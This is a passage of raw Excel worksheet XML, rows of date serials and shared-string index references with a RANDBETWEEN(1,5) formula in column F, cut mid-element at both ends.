      </c>
      <c r="C12373" t="s">
        <v>10</v>
      </c>
      <c r="D12373" t="s">
        <v>17</v>
      </c>
      <c r="E12373" s="2" t="s">
        <v>11090</v>
      </c>
      <c r="F12373">
        <f t="shared" ca="1" si="193"/>
        <v>4</v>
      </c>
    </row>
    <row r="12374" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12374" s="1">
        <v>43300.494351851848</v>
      </c>
      <c r="C12374" t="s">
        <v>10</v>
      </c>
      <c r="D12374" t="s">
        <v>1091</v>
      </c>
      <c r="E12374" t="s">
        <v>11091</v>
      </c>
      <c r="F12374">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12375" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12375" s="1">
        <v>43300.493842592594</v>
      </c>
      <c r="C12375" t="s">
        <v>10</v>
      </c>
      <c r="D12375" t="s">
        <v>80</v>
      </c>
      <c r="E12375" t="s">
        <v>11092</v>
      </c>
      <c r="F12375">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12376" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12376" s="1">
        <v>43300.493587962963</v>
      </c>
      <c r="C12376" t="s">
        <v>10</v>
      </c>
      <c r="D12376" t="s">
        <v>89</v>
      </c>
      <c r="E12376" t="s">
        <v>11093</v>
      </c>
      <c r="F12376">
        <f t="shared" ca="1" si="193"/>
        <v>3</v>
      </c>
    </row>
    <row r="12377" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12377" s="1">
        <v>43300.469722222224</v>
      </c>
      <c r="C12377" t="s">
        <v>10</v>
      </c>
      <c r="D12377" t="s">
        <v>14</v>
      </c>
      <c r="E12377" t="s">
        <v>11094</v>
      </c>
      <c r="F12377">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12378" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12378" s="1">
        <v>43300.431631944448</v>
      </c>
      <c r="C12378" t="s">
        <v>280</v>
      </c>
      <c r="D12378" t="s">
        <v>885</v>
      </c>
      <c r="E12378" t="s">
        <v>10507</v>
      </c>
      <c r="F12378">
        <f t="shared" ca="1" si="193"/>
        <v>3</v>
      </c>
    </row>
    <row r="12379" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A12379" s="1">
        <v>43300.413611111115</v>
      </c>
      <c r="C12379" t="s">
        <v>10</v>
      </c>
      <c r="D12379" t="s">
        <v>56</v>
      </c>
      <c r="E12379" s="2" t="s">
        <v>11095</v>
      </c>
      <c r="F12379">
        <f t="shared" ca="1" si="193"/>
        <v>3</v>
      </c>
    </row>
    <row r="12380" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12380" s="1">
        <v>43300.400555555556</v>
      </c>
      <c r="C12380" t="s">
        <v>16</v>
      </c>
      <c r="E12380" t="s">
        <v>11096</v>
      </c>
      <c r="F12380">
        <f t="shared" ca="1" si="193"/>
        <v>5</v>
      </c>
    </row>
    <row r="12381" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12381" s="1">
        <v>43300.392638888887</v>
      </c>
      <c r="C12381" t="s">
        <v>10</v>
      </c>
      <c r="D12381" t="s">
        <v>86</v>
      </c>
      <c r="E12381" t="s">
        <v>11097</v>
      </c>
      <c r="F12381">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12382" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12382" s="1">
        <v>43300.323993055557</v>
      </c>
      <c r="C12382" t="s">
        <v>48</v>
      </c>
      <c r="E12382" t="s">
        <v>11098</v>
      </c>
      <c r="F12382">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12383" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12383" s="1">
        <v>43300.282696759263</v>
      </c>
      <c r="C12383" t="s">
        <v>41</v>
      </c>
      <c r="E12383" s="2" t="s">
        <v>11099</v>
      </c>
      <c r="F12383">
        <f t="shared" ca="1" si="193"/>
        <v>3</v>
      </c>
    </row>
    <row r="12384" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12384" s="1">
        <v>43300.201215277775</v>
      </c>
      <c r="C12384" t="s">
        <v>73</v>
      </c>
      <c r="E12384" s="2" t="s">
        <v>11100</v>
      </c>
      <c r="F12384">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12385" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12385" s="1">
        <v>43300.192766203705</v>
      </c>
      <c r="C12385" t="s">
        <v>454</v>
      </c>
      <c r="E12385" t="s">
        <v>11101</v>
      </c>
      <c r="F12385">
        <f t="shared" ca="1" si="193"/>
        <v>5</v>
      </c>
    </row>
    <row r="12386" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12386" s="1">
        <v>43300.173402777778</v>
      </c>
      <c r="C12386" t="s">
        <v>4879</v>
      </c>
      <c r="D12386" t="s">
        <v>33</v>
      </c>
      <c r="E12386" t="s">
        <v>8504</v>
      </c>
      <c r="F12386">
        <f t="shared" ca="1" si="193"/>
        <v>4</v>
      </c>
    </row>
    <row r="12387" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A12387" s="1">
        <v>43300.136643518519</v>
      </c>
      <c r="C12387" t="s">
        <v>776</v>
      </c>
      <c r="D12387" t="s">
        <v>46</v>
      </c>
      <c r="E12387" s="2" t="s">
        <v>11102</v>
      </c>
      <c r="F12387">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12388" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12388" s="1">
        <v>43299.971689814818</v>
      </c>
      <c r="C12388" t="s">
        <v>73</v>
      </c>
      <c r="E12388" t="s">
        <v>11103</v>
      </c>
      <c r="F12388">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12389" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12389" s="1">
        <v>43299.948888888888</v>
      </c>
      <c r="C12389" t="s">
        <v>140</v>
      </c>
      <c r="D12389" t="s">
        <v>234</v>
      </c>
      <c r="E12389" t="s">
        <v>11104</v>
      </c>
      <c r="F12389">
        <f t="shared" ca="1" si="193"/>
        <v>5</v>
      </c>
    </row>
    <row r="12390" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12390" s="1">
        <v>43299.805844907409</v>
      </c>
      <c r="C12390" t="s">
        <v>6</v>
      </c>
      <c r="D12390" t="s">
        <v>25</v>
      </c>
      <c r="E12390" t="s">
        <v>11105</v>
      </c>
      <c r="F12390">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12391" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12391" s="1">
        <v>43299.788506944446</v>
      </c>
      <c r="C12391" t="s">
        <v>10</v>
      </c>
      <c r="D12391" t="s">
        <v>56</v>
      </c>
      <c r="E12391" s="2" t="s">
        <v>11106</v>
      </c>
      <c r="F12391">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12392" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12392" s="1">
        <v>43299.745937500003</v>
      </c>
      <c r="C12392" t="s">
        <v>10</v>
      </c>
      <c r="D12392" t="s">
        <v>80</v>
      </c>
      <c r="E12392" t="s">
        <v>11107</v>
      </c>
      <c r="F12392">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12393" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12393" s="1">
        <v>43299.736747685187</v>
      </c>
      <c r="C12393" t="s">
        <v>10</v>
      </c>
      <c r="D12393" t="s">
        <v>94</v>
      </c>
      <c r="E12393" s="2" t="s">
        <v>11108</v>
      </c>
      <c r="F12393">
        <f t="shared" ca="1" si="193"/>
        <v>5</v>
      </c>
    </row>
    <row r="12394" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12394" s="1">
        <v>43299.728831018518</v>
      </c>
      <c r="C12394" t="s">
        <v>301</v>
      </c>
      <c r="D12394" t="s">
        <v>56</v>
      </c>
      <c r="E12394" t="s">
        <v>11109</v>
      </c>
      <c r="F12394">
        <f t="shared" ca="1" si="193"/>
        <v>4</v>
      </c>
    </row>
    <row r="12395" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12395" s="1">
        <v>43299.70784722222</v>
      </c>
      <c r="C12395" t="s">
        <v>10</v>
      </c>
      <c r="D12395" t="s">
        <v>6</v>
      </c>
      <c r="E12395" s="2" t="s">
        <v>11110</v>
      </c>
      <c r="F12395">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12396" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12396" s="1">
        <v>43299.705428240741</v>
      </c>
      <c r="C12396" t="s">
        <v>6</v>
      </c>
      <c r="D12396" t="s">
        <v>25</v>
      </c>
      <c r="E12396" s="2" t="s">
        <v>11111</v>
      </c>
      <c r="F12396">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12397" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12397" s="1">
        <v>43299.655798611115</v>
      </c>
      <c r="C12397" t="s">
        <v>65</v>
      </c>
      <c r="D12397" t="s">
        <v>124</v>
      </c>
      <c r="E12397" s="2" t="s">
        <v>11112</v>
      </c>
      <c r="F12397">
        <f t="shared" ca="1" si="193"/>
        <v>4</v>
      </c>
    </row>
    <row r="12398" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12398" s="1">
        <v>43299.655787037038</v>
      </c>
      <c r="C12398" t="s">
        <v>139</v>
      </c>
      <c r="D12398" t="s">
        <v>6</v>
      </c>
      <c r="E12398" s="2" t="s">
        <v>11058</v>
      </c>
      <c r="F12398">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12399" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12399" s="1">
        <v>43299.655775462961</v>
      </c>
      <c r="C12399" t="s">
        <v>328</v>
      </c>
      <c r="D12399" t="s">
        <v>632</v>
      </c>
      <c r="E12399" s="2" t="s">
        <v>11113</v>
      </c>
      <c r="F12399">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12400" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12400" s="1">
        <v>43299.655763888892</v>
      </c>
      <c r="C12400" t="s">
        <v>1611</v>
      </c>
      <c r="D12400" t="s">
        <v>163</v>
      </c>
      <c r="E12400" s="2" t="s">
        <v>11114</v>
      </c>
      <c r="F12400">
        <f t="shared" ca="1" si="193"/>
        <v>3</v>
      </c>
    </row>
    <row r="12401" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12401" s="1">
        <v>43299.655775462961</v>
      </c>
      <c r="C12401" t="s">
        <v>5087</v>
      </c>
      <c r="D12401" t="s">
        <v>94</v>
      </c>
      <c r="E12401" s="2" t="s">
        <v>11115</v>
      </c>
      <c r="F12401">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12402" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12402" s="1">
        <v>43299.649502314816</v>
      </c>
      <c r="C12402" t="s">
        <v>10375</v>
      </c>
      <c r="D12402" t="s">
        <v>33</v>
      </c>
      <c r="E12402" s="2" t="s">
        <v>11116</v>
      </c>
      <c r="F12402">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12403" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12403" s="1">
        <v>43299.628622685188</v>
      </c>
      <c r="C12403" t="s">
        <v>10</v>
      </c>
      <c r="D12403" t="s">
        <v>80</v>
      </c>
      <c r="E12403" s="2" t="s">
        <v>11117</v>
      </c>
      <c r="F12403">
        <f t="shared" ca="1" si="193"/>
        <v>5</v>
      </c>
    </row>
    <row r="12404" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12404" s="1">
        <v>43299.61109953704</v>
      </c>
      <c r="C12404" t="s">
        <v>6</v>
      </c>
      <c r="D12404" t="s">
        <v>821</v>
      </c>
      <c r="E12404" t="s">
        <v>11118</v>
      </c>
      <c r="F12404">
        <f t="shared" ca="1" si="193"/>
        <v>3</v>
      </c>
    </row>
    <row r="12405" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12405" s="1">
        <v>43299.607523148145</v>
      </c>
      <c r="C12405" t="s">
        <v>260</v>
      </c>
      <c r="E12405" s="2" t="s">
        <v>11119</v>
      </c>
      <c r="F12405">
        <f t="shared" ca="1" si="193"/>
        <v>3</v>
      </c>
    </row>
    <row r="12406" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12406" s="1">
        <v>43299.60659722222</v>
      </c>
      <c r="C12406" t="s">
        <v>10</v>
      </c>
      <c r="D12406" t="s">
        <v>112</v>
      </c>
      <c r="E12406" t="s">
        <v>11120</v>
      </c>
      <c r="F12406">
        <f t="shared" ca="1" si="193"/>
        <v>4</v>
      </c>
    </row>
    <row r="12407" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12407" s="1">
        <v>43299.589560185188</v>
      </c>
      <c r="C12407" t="s">
        <v>10</v>
      </c>
      <c r="D12407" t="s">
        <v>222</v>
      </c>
      <c r="E12407" t="s">
        <v>11121</v>
      </c>
      <c r="F12407">
        <f t="shared" ca="1" si="193"/>
        <v>4</v>
      </c>
    </row>
    <row r="12408" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12408" s="1">
        <v>43299.583564814813</v>
      </c>
      <c r="C12408" t="s">
        <v>189</v>
      </c>
      <c r="D12408" t="s">
        <v>56</v>
      </c>
      <c r="E12408" s="2" t="s">
        <v>11122</v>
      </c>
      <c r="F12408">
        <f t="shared" ca="1" si="193"/>
        <v>3</v>
      </c>
    </row>
    <row r="12409" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12409" s="1">
        <v>43299.583564814813</v>
      </c>
      <c r="C12409" t="s">
        <v>29</v>
      </c>
      <c r="D12409" t="s">
        <v>11</v>
      </c>
      <c r="E12409" s="2" t="s">
        <v>11123</v>
      </c>
      <c r="F12409">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12410" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12410" s="1">
        <v>43299.583564814813</v>
      </c>
      <c r="C12410" t="s">
        <v>1408</v>
      </c>
      <c r="D12410" t="s">
        <v>163</v>
      </c>
      <c r="E12410" s="2" t="s">
        <v>11124</v>
      </c>
      <c r="F12410">
        <f t="shared" ca="1" si="193"/>
        <v>5</v>
      </c>
    </row>
    <row r="12411" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12411" s="1">
        <v>43299.583553240744</v>
      </c>
      <c r="C12411" t="s">
        <v>3994</v>
      </c>
      <c r="D12411" t="s">
        <v>46</v>
      </c>
      <c r="E12411" s="2" t="s">
        <v>11125</v>
      </c>
      <c r="F12411">
        <f t="shared" ca="1" si="193"/>
        <v>4</v>
      </c>
    </row>
    <row r="12412" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12412" s="1">
        <v>43299.583553240744</v>
      </c>
      <c r="C12412" t="s">
        <v>50</v>
      </c>
      <c r="D12412" t="s">
        <v>263</v>
      </c>
      <c r="E12412" s="2" t="s">
        <v>11067</v>
      </c>
      <c r="F12412">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12413" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12413" s="1">
        <v>43299.583553240744</v>
      </c>
      <c r="C12413" t="s">
        <v>1510</v>
      </c>
      <c r="D12413" t="s">
        <v>11</v>
      </c>
      <c r="E12413" s="2" t="s">
        <v>11126</v>
      </c>
      <c r="F12413">
        <f t="shared" ca="1" si="193"/>
        <v>1</v>
      </c>
    </row>
    <row r="12414" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12414" s="1">
        <v>43299.583553240744</v>
      </c>
      <c r="C12414" t="s">
        <v>2225</v>
      </c>
      <c r="D12414" t="s">
        <v>41</v>
      </c>
      <c r="E12414" s="2" t="s">
        <v>11127</v>
      </c>
      <c r="F12414">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12415" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12415" s="1">
        <v>43299.583333333336</v>
      </c>
      <c r="C12415" t="s">
        <v>10</v>
      </c>
      <c r="D12415" t="s">
        <v>36</v>
      </c>
      <c r="E12415" t="s">
        <v>11128</v>
      </c>
      <c r="F12415">
        <f t="shared" ca="1" si="193"/>
        <v>2</v>
      </c>
    </row>
    <row r="12416" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12416" s="1">
        <v>43299.58148148148</v>
      </c>
      <c r="C12416" t="s">
        <v>10</v>
      </c>
      <c r="D12416" t="s">
        <v>17</v>
      </c>
      <c r="E12416" t="s">
        <v>11129</v>
      </c>
      <c r="F12416">
        <f t="shared" ca="1" si="193"/>
        <v>4</v>
      </c>
    </row>
    <row r="12417" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12417" s="1">
        <v>43299.570416666669</v>
      </c>
      <c r="C12417" t="s">
        <v>10</v>
      </c>
      <c r="D12417" t="s">
        <v>20</v>
      </c>
      <c r="E12417" t="s">
        <v>11130</v>
      </c>
      <c r="F12417">
        <f t="shared" ca="1" si="193"/>
        <v>5</v>
      </c>
    </row>
    <row r="12418" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12418" s="1">
        <v>43299.55982638889</v>
      </c>
      <c r="C12418" t="s">
        <v>6</v>
      </c>
      <c r="D12418" t="s">
        <v>25</v>
      </c>
      <c r="E12418" t="s">
        <v>11131</v>
      </c>
      <c r="F12418">
        <f t="shared" ref="F12418:F12481" ca="1" si="194">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="12419" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12419" s="1">
        <v>43299.555324074077</v>
      </c>
      <c r="C12419" t="s">
        <v>10</v>
      </c>
      <c r="D12419" t="s">
        <v>11</v>
      </c>
      <c r="E12419" t="s">
        <v>11132</v>
      </c>
      <c r="F12419">
        <f t="shared" ca="1" si="194"/>
        <v>2</v>
      </c>
    </row>
    <row r="12420" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12420" s="1">
        <v>43299.516527777778</v>
      </c>
      <c r="C12420" t="s">
        <v>10</v>
      </c>
      <c r="D12420" t="s">
        <v>222</v>
      </c>
      <c r="E12420" t="s">
        <v>11133</v>
      </c>
      <c r="F12420">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12421" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12421" s="1">
        <v>43299.503981481481</v>
      </c>
      <c r="C12421" t="s">
        <v>173</v>
      </c>
      <c r="E12421" s="2" t="s">
        <v>11134</v>
      </c>
      <c r="F12421">
        <f t="shared" ca="1" si="194"/>
        <v>1</v>
      </c>
    </row>
    <row r="12422" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12422" s="1">
        <v>43299.491273148145</v>
      </c>
      <c r="C12422" t="s">
        <v>10</v>
      </c>
      <c r="D12422" t="s">
        <v>290</v>
      </c>
      <c r="E12422" t="s">
        <v>11135</v>
      </c>
      <c r="F12422">
        <f t="shared" ca="1" si="194"/>
        <v>4</v>
      </c>
    </row>
    <row r="12423" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12423" s="1">
        <v>43299.473425925928</v>
      </c>
      <c r="C12423" t="s">
        <v>10</v>
      </c>
      <c r="D12423" t="s">
        <v>178</v>
      </c>
      <c r="E12423" t="s">
        <v>11136</v>
      </c>
      <c r="F12423">
        <f t="shared" ca="1" si="194"/>
        <v>4</v>
      </c>
    </row>
    <row r="12424" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12424" s="1">
        <v>43299.468993055554</v>
      </c>
      <c r="C12424" t="s">
        <v>41</v>
      </c>
      <c r="E12424" t="s">
        <v>11137</v>
      </c>
      <c r="F12424">
        <f t="shared" ca="1" si="194"/>
        <v>1</v>
      </c>
    </row>
    <row r="12425" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12425" s="1">
        <v>43299.4687962963</v>
      </c>
      <c r="C12425" t="s">
        <v>1050</v>
      </c>
      <c r="E12425" s="2" t="s">
        <v>11138</v>
      </c>
      <c r="F12425">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12426" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12426" s="1">
        <v>43299.457175925927</v>
      </c>
      <c r="C12426" t="s">
        <v>10</v>
      </c>
      <c r="D12426" t="s">
        <v>14</v>
      </c>
      <c r="E12426" t="s">
        <v>11139</v>
      </c>
      <c r="F12426">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12427" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12427" s="1">
        <v>43299.444687499999</v>
      </c>
      <c r="C12427" t="s">
        <v>471</v>
      </c>
      <c r="E12427" s="2" t="s">
        <v>11140</v>
      </c>
      <c r="F12427">
        <f t="shared" ca="1" si="194"/>
        <v>4</v>
      </c>
    </row>
    <row r="12428" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12428" s="1">
        <v>43299.422418981485</v>
      </c>
      <c r="C12428" t="s">
        <v>10</v>
      </c>
      <c r="D12428" t="s">
        <v>178</v>
      </c>
      <c r="E12428" t="s">
        <v>11141</v>
      </c>
      <c r="F12428">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12429" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12429" s="1">
        <v>43299.41611111111</v>
      </c>
      <c r="C12429" t="s">
        <v>471</v>
      </c>
      <c r="E12429" s="2" t="s">
        <v>11142</v>
      </c>
      <c r="F12429">
        <f t="shared" ca="1" si="194"/>
        <v>4</v>
      </c>
    </row>
    <row r="12430" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12430" s="1">
        <v>43299.411909722221</v>
      </c>
      <c r="C12430" t="s">
        <v>48</v>
      </c>
      <c r="E12430" t="s">
        <v>11143</v>
      </c>
      <c r="F12430">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12431" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12431" s="1">
        <v>43299.411666666667</v>
      </c>
      <c r="C12431" t="s">
        <v>48</v>
      </c>
      <c r="E12431" t="s">
        <v>11143</v>
      </c>
      <c r="F12431">
        <f t="shared" ca="1" si="194"/>
        <v>1</v>
      </c>
    </row>
    <row r="12432" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12432" s="1">
        <v>43299.406747685185</v>
      </c>
      <c r="C12432" t="s">
        <v>41</v>
      </c>
      <c r="E12432" t="s">
        <v>11144</v>
      </c>
      <c r="F12432">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12433" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A12433" s="1">
        <v>43299.399664351855</v>
      </c>
      <c r="C12433" t="s">
        <v>103</v>
      </c>
      <c r="E12433" s="2" t="s">
        <v>11145</v>
      </c>
      <c r="F12433">
        <f t="shared" ca="1" si="194"/>
        <v>4</v>
      </c>
    </row>
    <row r="12434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12434" s="1">
        <v>43299.387604166666</v>
      </c>
      <c r="C12434" t="s">
        <v>6</v>
      </c>
      <c r="D12434" t="s">
        <v>25</v>
      </c>
      <c r="E12434" t="s">
        <v>11146</v>
      </c>
      <c r="F12434">
        <f t="shared" ca="1" si="194"/>
        <v>2</v>
      </c>
    </row>
    <row r="12435" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A12435" s="1">
        <v>43299.374548611115</v>
      </c>
      <c r="C12435" t="s">
        <v>10</v>
      </c>
      <c r="D12435" t="s">
        <v>817</v>
      </c>
      <c r="E12435" s="2" t="s">
        <v>11147</v>
      </c>
      <c r="F12435">
        <f t="shared" ca="1" si="194"/>
        <v>1</v>
      </c>
    </row>
    <row r="12436" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A12436" s="1">
        <v>43299.371446759258</v>
      </c>
      <c r="C12436" t="s">
        <v>229</v>
      </c>
      <c r="E12436" s="2" t="s">
        <v>11148</v>
      </c>
      <c r="F12436">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12437" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12437" s="1">
        <v>43299.370034722226</v>
      </c>
      <c r="C12437" t="s">
        <v>6</v>
      </c>
      <c r="D12437" t="s">
        <v>25</v>
      </c>
      <c r="E12437" s="2" t="s">
        <v>11149</v>
      </c>
      <c r="F12437">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12438" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12438" s="1">
        <v>43299.3675</v>
      </c>
      <c r="C12438" t="s">
        <v>65</v>
      </c>
      <c r="E12438" t="s">
        <v>11150</v>
      </c>
      <c r="F12438">
        <f t="shared" ca="1" si="194"/>
        <v>4</v>
      </c>
    </row>
    <row r="12439" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12439" s="1">
        <v>43299.355590277781</v>
      </c>
      <c r="C12439" t="s">
        <v>253</v>
      </c>
      <c r="E12439" s="2" t="s">
        <v>11151</v>
      </c>
      <c r="F12439">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12440" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12440" s="1">
        <v>43299.34646990741</v>
      </c>
      <c r="C12440" t="s">
        <v>124</v>
      </c>
      <c r="E12440" s="2" t="s">
        <v>11152</v>
      </c>
      <c r="F12440">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12441" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12441" s="1">
        <v>43299.337673611109</v>
      </c>
      <c r="C12441" t="s">
        <v>10</v>
      </c>
      <c r="D12441" t="s">
        <v>36</v>
      </c>
      <c r="E12441" t="s">
        <v>11153</v>
      </c>
      <c r="F12441">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12442" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12442" s="1">
        <v>43299.328217592592</v>
      </c>
      <c r="C12442" t="s">
        <v>71</v>
      </c>
      <c r="E12442" s="2" t="s">
        <v>11154</v>
      </c>
      <c r="F12442">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12443" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12443" s="1">
        <v>43299.312986111108</v>
      </c>
      <c r="C12443" t="s">
        <v>41</v>
      </c>
      <c r="E12443" t="s">
        <v>11155</v>
      </c>
      <c r="F12443">
        <f t="shared" ca="1" si="194"/>
        <v>4</v>
      </c>
    </row>
    <row r="12444" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12444" s="1">
        <v>43299.312847222223</v>
      </c>
      <c r="C12444" t="s">
        <v>3163</v>
      </c>
      <c r="D12444" t="s">
        <v>41</v>
      </c>
      <c r="E12444" t="s">
        <v>11156</v>
      </c>
      <c r="F12444">
        <f t="shared" ca="1" si="194"/>
        <v>4</v>
      </c>
    </row>
    <row r="12445" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A12445" s="1">
        <v>43299.27076388889</v>
      </c>
      <c r="C12445" t="s">
        <v>1931</v>
      </c>
      <c r="E12445" s="2" t="s">
        <v>11157</v>
      </c>
      <c r="F12445">
        <f t="shared" ca="1" si="194"/>
        <v>4</v>
      </c>
    </row>
    <row r="12446" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A12446" s="1">
        <v>43299.250706018516</v>
      </c>
      <c r="C12446" t="s">
        <v>10</v>
      </c>
      <c r="D12446" t="s">
        <v>6</v>
      </c>
      <c r="E12446" s="2" t="s">
        <v>11158</v>
      </c>
      <c r="F12446">
        <f t="shared" ca="1" si="194"/>
        <v>1</v>
      </c>
    </row>
    <row r="12447" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A12447" s="1">
        <v>43299.24658564815</v>
      </c>
      <c r="C12447" t="s">
        <v>71</v>
      </c>
      <c r="D12447" t="s">
        <v>312</v>
      </c>
      <c r="E12447" s="2" t="s">
        <v>11159</v>
      </c>
      <c r="F12447">
        <f t="shared" ca="1" si="194"/>
        <v>1</v>
      </c>
    </row>
    <row r="12448" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12448" s="1">
        <v>43299.241030092591</v>
      </c>
      <c r="C12448" t="s">
        <v>253</v>
      </c>
      <c r="E12448" s="2" t="s">
        <v>11160</v>
      </c>
      <c r="F12448">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12449" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12449" s="1">
        <v>43299.209583333337</v>
      </c>
      <c r="C12449" t="s">
        <v>139</v>
      </c>
      <c r="E12449" s="2" t="s">
        <v>11161</v>
      </c>
      <c r="F12449">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12450" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12450" s="1">
